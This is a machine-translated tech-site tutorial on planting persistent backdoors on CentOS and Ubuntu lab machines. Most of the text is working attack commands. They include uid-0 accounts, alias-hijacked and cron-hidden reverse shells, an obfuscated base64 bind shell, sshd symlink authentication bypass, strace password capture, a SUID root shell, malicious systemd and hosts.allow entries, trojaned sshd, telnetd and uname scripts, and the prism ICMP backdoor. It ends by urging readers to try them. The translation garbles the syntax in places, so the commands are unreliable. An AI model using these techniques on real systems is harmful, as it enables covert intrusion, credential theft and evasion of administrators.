Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to understand the back door of the Linux system". In the daily operation, I believe many people have doubts about how to understand the back door of the Linux system. The editor consulted all kinds of materials and sorted out simple and easy-to-use operation methods. I hope it will be helpful for you to answer the doubts about "how to understand the back door of the Linux system"! Next, please follow the editor to study!

Platform and tool version:

Host system: manjaro linux (192.168.242.1)

Hypervisor: vmware workstation 16

Virtual machines: CentOS 7 (192.168.242.133), ubuntu (192.168.242.143), CentOS 6.5 (192.168.242.132)

1. Linux system creates backdoor accounts with uid 0 (1) CentOS 7 system command line creates users with uid 0

1. Create directly

Useradd-o-u 0 backdoor & & echo "Eu2xa2fu@#" | passwd backdoor-- stdin

It is verified that you can log in normally.

/ / create users interactively and set passwords

Useradd-o-u 0 test1

Passwd test1

2. Combine the command with PROMPT_COMMAND

(1) write / root/.bashrc file

Vi / root/.bashrc / / Edit the configuration file for the root user and add the following

Export PROMPT_COMMAND= "/ usr/sbin/useradd-o-u 0 hack & > / dev/null & & echo hacker:123456 | / usr/sbin/chpasswd & > / dev/null & & unset PROMPT_COMMAND"

Save exit

Source / root/.bashrc / / executes the instructions in the file, and the account is created.

Each time you switch to root later, the instructions in / root/.bashrc are executed to create an account.

(2) Verification

Cat / etc/passwd | grep hack

The backdoor account was created successfully.

(2) Ubuntu system

Useradd-p 0`openssl passwd-1-salt 'abc' pass1234`-u 0-o-g root-G root-s / bin/bash hack

Created successfully.

Second, CentOS 7 system to create alias backdoor (1) create Linux system commands such as ls aliases 1, controlled side to create aliases

/ / use ruby to implement bounce connection (receive using netcat). After the ruby rebound connection is established, it will be transferred to the background without exposing any trace, which is very hidden. It is recommended to use. Notice that the internal double quotation marks are all "'".

Alias ls= "alerts () {ls $*-color=auto;ruby-rsocket-e 'exit if fork;c=TCPSocket.new ("' "" 192.168.242.1 ","5555"); while (cmd=c.gets); IO.popen (cmd, "r") {| io | c.print io.read} end';}; alerts "

/ / use ruby to implement bounce connection (receive with msfconsole). Pay attention to the nesting of double quotes.

Alias ls= "alerts () {ls $*-- color=auto;ruby-rsocket-ropenssl-e'exit if fork;c=OpenSSL::SSL::SSLSocket.new (TCPSocket.new ("'"" 192.168.242.1 ","5555"). Connect;while (cmd=c.gets); IO.popen (cmd.to_s, "r") {| io | c.print io.read} end';}; alerts "

2. Attackers listen to local ports

Nc-l-p 5555

3. The administrator of the controlled side executes the ls command (ruby, which is received by netcat)

4. The attacker gets a rebound shell.

(2) create aliases for alias and unalias

Because the alias command can view the current alias, it exposes ls's bounce instructions. So you need to hijack the alias command so that the bounce instruction does not appear in its output. In addition, the unalias command clears the alias, so it should also be hijacked to prevent the alias of ls from being cleared.

1. Create an alias for unalias

/ / if you first create an alias for alias, then alias loses the function of the original alias, and the alias for unalias cannot be created.

Alias unalias='alerts () {if [$#! = 0]; then if [$*! = "ls"] & & [$*! = "alias"] & & [$*! = "unalias"]; then unalias $*; else echo "- bash: unalias: ${*}: not found"; fi;else echo "unalias: usage: unalias [- a] name [name.]"; fi;}; alerts'

The ls alias is not cleared.

2. Create an alias for alias

Vi / tmp/.alias.txt / / add the following

Alias egrep='egrep-color=auto'

Alias fgrep='fgrep-color=auto'

Alias grep='grep-color=auto'

Alias l.='ls-d. *-color=auto'

Alias ll='ls-l-color=auto'

Alias ls='ls-color=auto'

Alias vi='vim'

Alias which='alias | / usr/bin/which-tty-only-read-alias-show-dot-show-tilde'

Save exit

Alias alias= "cat / tmp/.alias.txt"

(3) add alias to a hidden location 1. Create a reasonable file in a normal location

Vi / etc/yum/yum-update.rc / / create a file and add alias settings

Alias ls= "alerts () {ls $*-color=auto;ruby-rsocket-e 'exit if fork;c=TCPSocket.new ("' "" 192.168.242.1 ","5555"); while (cmd=c.gets); IO.popen (cmd, "r") {| io | c.print io.read} end';}; alerts "

Alias unalias='alerts () {if [$#! = 0]; then if [$*! = "ls"] & & [$*! = "alias"] & & [$*! = "unalias"]; then unalias $*; else echo "- bash: unalias: ${*}: not found"; fi;else echo "unalias: usage: unalias [- a] name [name.]"; fi;}; alerts'

Alias alias= "cat / tmp/.alias.txt"

Save exit

2. Copy the time of the normal file to the file containing alias

Touch-acmr version-groups.conf yum-update.rc

3. Use alias alias to realize connection

Actions taken by the attacker:

The attacker gets a bounce shell:

3. CentOS 7 system creates bashrc backdoor (1) attackers write malicious instructions to ~ / .bashrc files

Su / / switch to root

Echo 'bash-I > & / dev/tcp/192.168.242.1/5555 0 > & 1' > ~ / .bashrc

(2) attackers monitor local ports

Nc-l-p 5555

(3) the administrator logs in to the attacked server

The su / / administrator logs in as a normal user and then switches to root

(IV) the attacker gets a rebound connection.

Nc-l-p 5555

Get the shell, indicating that the bounce instruction in the .bashrc file is executed.

4. CentOS 7 system creates crontab backdoor (1) add scheduled task method 1, use crontab command to create scheduled task, and use nc to receive connection

1. Add non-hidden scheduled tasks

Crontab-l | {cat; echo "* / 1 * bash-I > & / dev/tcp/192.168.242.1/5555 0 > & 1";} | crontab-

/ / perform a bounce connection every minute

The scheduled task was added successfully.

Nc-l-p 5555 / / the attacker listens on the local port

Get the shell, indicating that the planned task is executed.

2. Join scheduled tasks in a hidden way

(crontab-rno crontab for printf "* / 1 * bash-I > & / dev/tcp/192.168.242.1/5555 0 > & amp1;\ rno crontab for `whoami`0c\ n") | crontab-

The administrator cannot see the added scheduled tasks using crontab-l.

Explanation:

Crontab saves the user's scheduled tasks to the / var/spool/cron/ username file. Crontab-l actually uses the cat command to view this file:

But use the vim command to see that the contents of this file are:

You can also see the true contents of the file using the-An option of the cat command:

Cat-A / var/spool/cron/root

The attacker gets a bounce connection:

Method 2. Write the / etc/crontab file directly and receive the connection using msfconsole

Sh-c "echo'* root cd / tmp & & mknod backpipe p & & nc 192.168.242.1 5555 0backpie'> > / etc/crontab"

The attacker receives a bounce connection

Msfconsole

Use exploit/multi/handler

Set payload cmd/unix/reverse_bash

Set lhost 192.168.242.1

Set lport 5555

Exploit

The connection will be available in one minute:

CentOS 7 system creates a backdoor through the PROMPT_COMMAND environment variable (1) creates a backdoor and listens to port 1025

Vi ~ user1/.bashrc / / modify the configuration file to add the following

Export PROMPT_COMMAND= "lsof-idev/null 1025 & > / dev/null | (python-c\" exec ('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode (' base64'))\ "2 > / dev/null &)"

Save exit

Source ~ / .bashrc / / make the configuration effective immediately

Netstat-an | grep: 1025 / / View the listening of port 1025.

Each time a user1 user logs in, it automatically executes the instructions in its .bashrc file, that is, starts listening on port 1025.

(2) attackers connect remotely

Nc 192.168.242.133 1025

If you connect successfully, you will get shell.

6. CentOS 7 system creates ssh service backdoor

Principle: Linux soft link ssh backdoor requires ssh to support PAM authentication. Set the sshd soft link name to su so that after the command starts, it will look in the PAM configuration for the existence of configuration information for the corresponding su.

(1) create ssh backdoor

Ln-sf / usr/sbin/sshd / tmp/su;/tmp/su-oPort=31337

Start listening on port 31337.

You can also use the following command to listen on the port:

Ln-sf / usr/sbin/sshd / usr/local/su;/usr/local/su-oPort=12345

Ln-sf / usr/sbin/sshd / tmp/chsh;/tmp/chsh-oPort=12345

Ln-sf / usr/sbin/sshd / tmp/chfn;/tmp/chfn-oPort=12345

(II) remotely connect to the back door of ssh

Ssh-p 31337 root@192.168.242.133

Use root/bin/ftp/mail as the user name, the password is arbitrary, you can log in.

7. Manjaro 20 system creates ssh client backdoor (1) create alias of ssh command

Attacker: manjaro 20 system, edit the user's .bashrc configuration file.

Add the following instruction at the end of the vi ~ / .bashrc / / file

Alias ssh='strace-o / tmp/sshpwd- `date'+% d% h% m% s' `.log-e read,write,connect-s2048 ssh'

Save exit

Source / .bashrc

(2) obtain the ssh account password 1. Users in the manjaro system initiate ssh connections

Ssh user1@192.168.242.133 / / normal users perform ssh connections and generate records in the / tmp directory

2. Obtain ssh account / password

Cat / tmp/sshpwd- 2411 111606192953.log | grep-n password | grep write / / find the line where the specified information is located. Here is line 89.

Less / tmp/sshpwd- 2411 111606192953.log

Enter 89g and skip to line 89

The password is right here: 123456

8. CentOS 7 system creates ssh certificate backdoor (1) attackers generate asymmetric key pairs

Ssh-keygen-t rsa / / generate a public-private key pair and enter a key phrase

(2) CentOS 7 server configuration allows public key login

Vi / etc/ssh/sshd_config / / Edit the configuration file and set the following information

PermitRootLogin yes

StrictModes no

PubkeyAuthentication yes

AuthorizedKeysFile h/.ssh/authorized_keys

RSAAuthentication yes

Save exit

Note:

(1) the RSAAuthentication yes line needs to be handwritten to the last line in the configuration file.

(2) in the AuthorizedKeysFile parameter,% h represents the home directory used, and there is a point after% h /. If there is no point, there will be an error prompt of "Permission Denied (publickey)" and cannot be connected.

(3) pay attention to canceling the commentator at the beginning of the line.

Systemctl restart sshd / / restart the ssh service

The configuration takes effect.

(3) attackers upload certificates

Scp ~ / .ssh/id_rsa.pub root@192.168.242.133:~ / / an attacker uploads the public key of a local user to the server

Uploaded successfully. Note that it can be passed to the user's home directory, and do not copy to ~ / .ssh/id_rsa.pub, which will overwrite the target host's own public key file. Note that the id_rsa.pub file is not hidden.

You can also use ssh-copy-id to copy your own public key to the target system

Ssh-copy-id-I / .ssh/id_rsa.pub root@192.168.242.133

(4) CentOS 7 server adds the attacker's public key to authorized_keys

Cat / root/id_rsa.pub > > ~ / .ssh/authorized_keys

Systemctl restart sshd / / restart the ssh service

(5) the attacker logs in to the server through a certificate

Ssh-I / root/.ssh/id_rsa root@192.168.242.133

/ / since the public key is uploaded to the home directory of the server's root account, you need to specify the root user here. If not specified, the attacker's current user, user1, is used by default, and the public key is not previously uploaded to the server's user1 user's home directory, so account password authentication is required to log in.

9. CentOS 7 system create suid backdoor (1) create suid backdoor file 1, create source code file

Sudo echo 'int main () {setresuid; system ("/ bin/sh");}' > privshell.c

2. Compilation

Sudo gcc-o privshell privshell.c / / compiled into an executable file named privshell

3. Give the execution authority and set the suid flag bit

Sudo chown root:root privshell & & sudo chmod Utility privshell

(2) ordinary users execute suid backdoor to obtain root permission

. / privshell

10. CentOS 7 system creates systemd service backdoor (1) create backdoor 1, create service description file

Cd / usr/lib/systemd/system

Touch backdoor.service

Vi backdoor.service / / Edit the file and add the following

[Unit]

Description=Very important backdoor.

After=network.target

[Service]

Type=forking

ExecStart=nc-e / bin/bash 192.168.242.1 5555 > / dev/null 2 > & 1

ExecReload=

ExecStop=

PrivateTmp=true

[Install]

WantedBy=multi-user.target

Save exit

2. Give the executive authority

Chmod + x / usr/lib/systemd/system/backdoor.service

3. Make the service effective

Systemctl daemon-reload / / reread the service information

(2) attackers monitor local ports

Nc-l-p 5555

(3) the controlled terminal starts the back door

Systemctl enable backdoor

Systemctl start backdoor

(IV) attackers obtain shell

11. CentOS 7 system creates tcp wrapper backdoor

TCP_Wrappers is a security tool that works in the application layer, and it can protect some specific applications or services. For example, requests for ssh, telnet, FTP and other services will be blocked by TCP_Wrappers first.

TCP_Wrappers has a daemon for TCP called tcpd. Take telnet as an example. Whenever there is a connection request from telnet, tcpd will intercept the request and first read the access control file set by the system administrator. If it meets the requirements, the connection will be transferred intact to the real telnet process, and the telnet will complete the follow-up work. If the ip initiated by the connection does not meet the settings in the access control file, the connection request will be interrupted.

(1) Operation of the attacked server 1. Create tcp wrapper backdoor

Vi / etc/hosts.allow / / Edit the configuration file and add the following

ALL: ALL: spawn (bash-c "/ bin/bash-I > & / dev/tcp/192.168.242.1/443 0 > & 1") &: allow

Save exit.

The meaning of the above instruction is to allow all connections, and when the connection appears, start bash to bounce the connection.

(2) the attacker operates locally and listens to the local port

Sudo nc-l-p 443

2. Connect to the target server

Ssh 192.168.242.133 / / Connect to port 22 of the target server

No need to enter password

3. Receive bounce connection

The bounce shell was successfully obtained with the permission of root.

12. Ubuntu 1604 system creates rhosts++ backdoor (1) deploy rsh service 1, install rsh and xinetd

Apt-get install rsh-client rsh-server xinetd

2. Configure xinetd

Touch / etc/xinetd.d/rsh & & vi / etc/xinetd.d/rsh / / add the following

# default: on

# descrption: The rshd server is the server for the rcmd (3) routine and,\

# consequently, for the rsh (1) program. The server provides\

# remote execution facilities with authentication based on\

# privileged port numbers from trusted hosts.

Service shell

{

Disable = no

Socket_type = stream

Wait = no

User = root

Log_on_success + = USERID

Log_on_failure + = USERID

Server = / usr/sbin/in.rshd

}

/ etc/xinetd.d/rlogin

# default: on

# descrption: rlogind is the server for the rlogin (1) program. The server\

# provides a remote login facility with authentication based on\

# privileged port numbers from trusted hosts.

Service login

{

Disable = no

Socket_type = stream

Wait = no

User = root

Log_on_success + = USERID

Log_on_failure + = USERID

Server = / usr/sbin/in.rlogind

}

/ etc/xinetd.d/rexec

# default: off

# descrption: Rexecd is the server for the rexec (3) routine. The server\

# provides remote execution facilities with authentication based\

# on user names and passwords.

Service exec

{

Disable = no

Socket_type = stream

Wait = no

User = root

Log_on_success + = USERID

Log_on_failure + = USERID

Server = / usr/sbin/in.rexecd

}

Save exit

/ etc/init.d/xinetd restart / / restart the service, and rsh and other services will start

(2) create rhosts++ backdoor 1 and modify configuration file

Edit the file vi / root/.rhosts / / and add the following

+ +

Save exit

2. The attacker remotely accesses the ubuntu host

Rsh 192.168.242.143 date / / remote execution of system commands

Successful execution

Rsh 192.168.242.143 / bin/bash / / get the shell of the remote system

The back door was created successfully.

13. Ubuntu 1604 system creation xinetd backdoor (1) install xinetd service and telnetd service 1, install xinetd and telnetd software

Sudo apt-get install xinetd telnetd

Dpkg-L xinetd | grep'/ usr/sbin/\ | / etc/' / / View the executable file and configuration file of xinetd

/ usr/sbin/xinetd

/ usr/sbin/itox

/ usr/sbin/xconv.pl

/ etc/init

/ etc/init/xinetd.conf

/ etc/xinetd.conf

/ etc/init.d

/ etc/init.d/xinetd

/ etc/default

/ etc/default/xinetd

/ etc/xinetd.d

/ etc/xinetd.d/daytime

/ etc/xinetd.d/time

/ etc/xinetd.d/discard

/ etc/xinetd.d/echo

/ etc/xinetd.d/chargen

Dpkg-L telnetd | grep'/ usr/sbin\ | / etc/' / / View the executable file and configuration file of telnetd

/ usr/sbin

/ usr/sbin/in.telnetd

The telnetd package has only executable files and no configuration files.

2. Configure xinetd

Vi / etc/xinetd.d/telnet / / does not exist by default, create and edit, add the following

# default: on

# description: The telnet server serves telnet sessions; it uses\

# unencrypted username/password pairs for authentication.

Service telnet

{

Disable = no

Flags = REUSE

Socket_type = stream

Wait = no

User = root

Server = / usr/sbin/in.telnetd

Log_on_failure + = USERID

}

Save exit.

/ etc/init.d/xinetd restart / / restart the xinetd service

Netstat-an | grep: 23 / / View port snooping

3. Allow root to log in remotely

Vi / etc/securetty / / add the following

Pts/0

Pts/1

Pts/2

Pts/3

Save exit.

Service xinetd restart / / restart the service

In this way, root can log into linux through the terminals from pts/0 to pts/3.

(2) configure telnetd backdoor 1 and create backdoor script

Touch telnetd.sh & & chmod + x telnetd.sh

Vi telnetd.sh / / Edit the file and add the following

#! / bin/bash

Socat udp-connect:192.168.242.1:5555 exec:'bash-li',pty,stderr,sane 2 > & 1 > / dev/null &

/ usr/sbin/in.telnetd

Save exit.

2. Modify the telnet service configuration file

Vi / etc/xinetd.d/telnet

Server = / usr/sbin/in.telnetd

Change to

Server = / home/user1/telnetd.sh

Save exit.

/ etc/init.d/xinetd restart / / restart the xinetd service

Netstat-an | grep: 23 / / View port snooping

3. Attackers listen to local ports

Nc-ul-p 5555

4. The attacker accesses the telnet port of the target host

Telnet 192.168.242.143

The telnet service command is triggered to execute the script specified in the service profile.

5. The attacker gets a rebound shell

14. CentOS 7 system creates a shell script backdoor posing as a ssh service program (1) the controlled terminal creates fake sshd files

Mv / usr/sbin/sshd / usr/bin/ transfer the real sshd program

Touch / usr/sbin/sshd / / create fake sshd script files

Edit the file vi / usr/sbin/sshd / / and add the following

#! / usr/bin/perl

Exec "/ bin/bash" if (getpeername (STDIN) = ~ / ^.. LF/)

Exec {"/ usr/bin/sshd"} "/ usr/sbin/sshd", @ ARGV

Save exit

Chmod + x / usr/sbin/sshd / / give execution permission

Systemctl restart sshd / / restart the ssh service, actually executing the code in the malicious script

(2) attackers connect remotely

Socat STDIO TCP4:192.168.242.133:22,sourceport=19526

Note that the source port parameter must be added.

CentOS 7 system creates shell scripts that can impersonate system commands (1) attackers create scripts that impersonate uname programs on controlled servers

Touch / usr/local/bin/uname / / create a backdoor script file

Edit the file vi / usr/local/bin/uname / / and add the following

#! / bin/bash

Nc-l-v-p 4444-e / bin/bash 2 > / dev/null &

Socat TCP4-Listen:3177,fork EXEC:/bin/bash 2 > / dev/null &

Socat SCTP-Listen:1177,fork EXEC:/bin/bash 2 > / dev/null &

Perl-MIO-e'$s=new IO::Socket::INET (LocalPort= > 1337 accept = > 1); while ($cymbals-> accept ()) {$_ =; print $c `$ _ `;}'2 > / dev/null &

/ bin/uname $@

Save exit. The above four listening port commands can choose to execute one of them.

(2) the administrator runs the impersonated command

Uname-r

As you can see, execution is normal. But the port is also secretly listening:

(3) the attacker connects the controlled terminal remotely.

Nc 192.168.242.133 4444

All four ports can be connected.

CentOS 6.5 system uses icmp backdoor prism (1) download prism package

Https://github.com/andreafabrizi/prism/

(2) the attacker operates locally. 1. Decompress and compile prism.c, but do not execute

Gcc-DDETACH-M32-Wall-s-o prism prism.c

The compilation succeeded and the executable file was generated.

2. Transfer the prism executable file to the controlled terminal

Scp prism user1@192.168.242.132:/home/user1/

3. Attackers listen to local ports

Nc-l-p 6666

(3) the operation of the controlled terminal 1. In order to run prism normally, the following software needs to be installed.

Yum install glibc.i686

2. Run prism

. / prism / / run as root

There is no prompt after running

(4) the attacker operates locally, runs sendPacket.py, and specifies the IP address, connection password, IP address and listening port of the controlled side.

Python2 sendPacket.py 192.168.242.132 p4ssw0rd 192.168.242.1 6666

The connection password defaults to p4ssw0rd.

2. The listener receives the rebound connection

(5) check the traffic flow

The original sendPacket.py sent out the icmp package. Grab the bag to confirm:

The first packet is ICMP request, and the bounce address and connection password can be seen in the contents of the packet.

The following packets are all TCP protocol packets.

The control side issues the cat / etc/passwd command. From the data packets sent back to the control side, the source and destination IP addresses, source and destination ports can be seen. You can also see the data, which is the result of the cat / etc/passwd command.

So prism only triggers the connection through icmp, and the subsequent commands are transmitted through the TCP protocol. The software is suitable for situations where an attacker cannot actively connect to the server's TCP/UDP port, but can ping the server. Prism listens for icmp requests on the server and verifies the connection password. After verification, the server actively connects to the attacker's VPS, and the attacker gets a bounce shell. It can be seen that prism is an icmp back door.

At this point, the study on "how to understand the back door of Linux system" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.